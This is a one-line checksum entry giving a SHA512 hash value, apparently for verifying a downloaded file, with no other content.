SHA512 1c23132999185938961053c2435247a7365e3de1e9efd4d56be23972fb6ae10cb8101d09380933e9941b588b847e7bd235d57c31e28b2dbd1f66d0a06b3429cb